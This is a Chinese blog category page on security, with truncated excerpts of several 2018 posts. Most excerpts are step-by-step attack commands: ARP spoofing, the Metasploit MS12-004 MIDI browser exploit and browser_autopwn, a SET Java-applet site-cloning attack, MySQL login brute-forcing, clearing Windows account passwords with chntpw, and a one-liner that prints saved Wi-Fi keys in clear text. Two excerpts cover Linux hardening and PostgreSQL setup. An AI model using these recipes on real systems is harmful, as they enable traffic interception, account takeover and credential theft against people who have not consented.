随笔分类 -  安全

摘要:Arpspoof -i 网卡 -t 目标IP 网关 Kali : 网卡eth0 目标ip :192.168.1.100 网关:192.168.1.1 替换掉: arpspoof -i eth0 -t 192.168.100 192.168.1.1 怎么看局域网当中的ip呢 Fping -asg 19 阅读全文
posted @ 2018-01-10 17:48 journeyIT 阅读(801) 评论(0) 推荐(0)
摘要:1. use exploit/windows/browser/ms12_004_midi 2. show targets 3. info 4. set SRVHOST 【mine IP】 5. set SRVPORT 【80】 6. set URIPATH / 7. exploit -j 8. et 阅读全文
posted @ 2018-01-10 17:47 journeyIT 阅读(415) 评论(0) 推荐(0)
摘要:1. 打开 The Social-Engineer Toolkit 也就是所谓set 2. 依次选择 Social-Engineering Attacks Website Attacks Vectors Java Applet Attack Method Site Cloner 翻一下:社会工程学攻 阅读全文
posted @ 2018-01-10 17:47 journeyIT 阅读(845) 评论(0) 推荐(0)
摘要:search autopwn use server/browser_autopwn show options set LHOST set SRVPORT set URIPATH / show options 修改 etter.conf 文件 if you use ipchains if you us 阅读全文
posted @ 2018-01-10 17:46 journeyIT 阅读(110) 评论(0) 推荐(0)
摘要:search mysql use scanner/mysql/mysql_login show options set RHOSTS set USER_FILE /root/username.lst set PASS_FILE /root/passwords.lst exploit mysql -h 阅读全文
posted @ 2018-01-10 17:44 journeyIT 阅读(383) 评论(0) 推荐(0)
摘要:cd /mnt/windows/Windows/System32/config/ cd /mnt/windows/Windows/System32/config/ ls SAM chntpw -l SAM chntpw -u "username" SAM 1 - clear 阅读全文
posted @ 2018-01-10 17:43 journeyIT 阅读(379) 评论(0) 推荐(0)
摘要:一、注释掉系统不需要的用户和用户组 注意:不建议直接删除,当你需要某个用户时,自己重新添加会很麻烦。cp /etc/passwd /etc/passwdbak #修改之前先备份vi /etc/passwd #编辑用户,在前面加上#注释掉此行#adm:x:3:4:adm:/var/adm:/sbin/ 阅读全文
posted @ 2018-01-10 17:40 journeyIT 阅读(367) 评论(0) 推荐(0)
摘要:mkdir -p /var/lib/pgsql/data //创建pgsql的数据库目录cd /var/lib/pgsql chown postgres.postgres data //改变目录的所属用户用组su postgres //切换到postgres,不然初始化不initdb /var/li 阅读全文
posted @ 2018-01-10 17:39 journeyIT 阅读(3623) 评论(0) 推荐(0)
摘要:一、安装 首先,安装PostgreSQL客户端。 sudo apt-get install postgresql-client 然后,安装PostgreSQL服务器。 sudo apt-get install postgresql 正常情况下,安装完成后,PostgreSQL服务器会自动在本机的54 阅读全文
posted @ 2018-01-10 17:38 journeyIT 阅读(223) 评论(0) 推荐(0)
摘要:for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear 阅读全文
posted @ 2018-01-10 17:18 journeyIT 阅读(673) 评论(0) 推荐(0)